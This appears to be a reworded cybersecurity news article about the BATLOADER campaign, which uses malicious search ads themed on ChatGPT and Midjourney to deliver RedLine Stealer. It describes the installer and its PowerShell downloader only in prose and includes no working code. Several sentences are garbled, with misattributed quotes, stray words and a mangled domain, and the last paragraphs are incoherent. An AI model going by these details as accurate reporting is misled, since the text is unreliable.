Malicious Google search ads for generative AI services such as OpenAI ChatGPT and Midjourney are used to lure users to sketchy websites as part of the BATLOADER campaign aimed at delivering the RedLine Stealer malware .
In its analysis, eSentire said, “Both AI services are very popular, but lack first-party standalone apps (i.e., users interface with ChatGPT through a web interface, while Midjourney uses Discord. ),” he said.
“This void is being exploited by attackers to entice people to create fake web pages promoting fake apps.”
BATLOADER is a loader malware propagated by drive-by downloads, where users searching for specific keywords in search engines are presented with deceptive advertisements that, when clicked, redirect to a malicious landing page that hosts the malware.
According to eSentire, the installer file includes an executable (ChatGPT.exe or Midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads and loads RedLine Stealer from a remote server. is included.
Once installed, the binary uses Microsoft Edge WebView2 to load chat.openai.[.]com or www.midjourney[.]com (the canonical ChatGPT and Midjourney URL) in a popup window to avoid red flags.
The attackers used ChatGPT and Midjourney-themed lures to serve malicious ads, ultimately dropping the RedLine Stealer malware, was also highlighted by Trend Micro last week.
This isn’t the first time the operators behind BATLOADER have taken advantage of the AI craze to distribute malware. In March 2023, eSentire detailed a series of similar attacks utilizing ChatGPT lures to deploy He Vidar Stealer and Ursnif.
The cybersecurity firm also noted that Google search ad abuse has declined from its peak in early 2023, suggesting the tech giant is taking aggressive steps to curb its abuse.
Zero Trust + Deception: Learn How to Outsmart Attackers!
See how Deception can detect advanced threats, stop lateral movement, and strengthen your Zero Trust strategy. Join us for an insightful webinar!
Reserve your seat!
The findings indicate that OCX# targeted the cryptocurrency sector from December 2022 to March 2023 using More_eggs (aka Golden Chickens), a JavaScript downloader used to deliver additional payloads. The announcement came weeks after Securonix discovered a phishing campaign called HARVESTER.
In January, eSentire traced the identity of one of the leading Malware-as-a-Service (MaaS) operators to an individual in Montreal, Canada. His second attacker, associated with this group, then turned out to be a Romanian with the alias Jack.
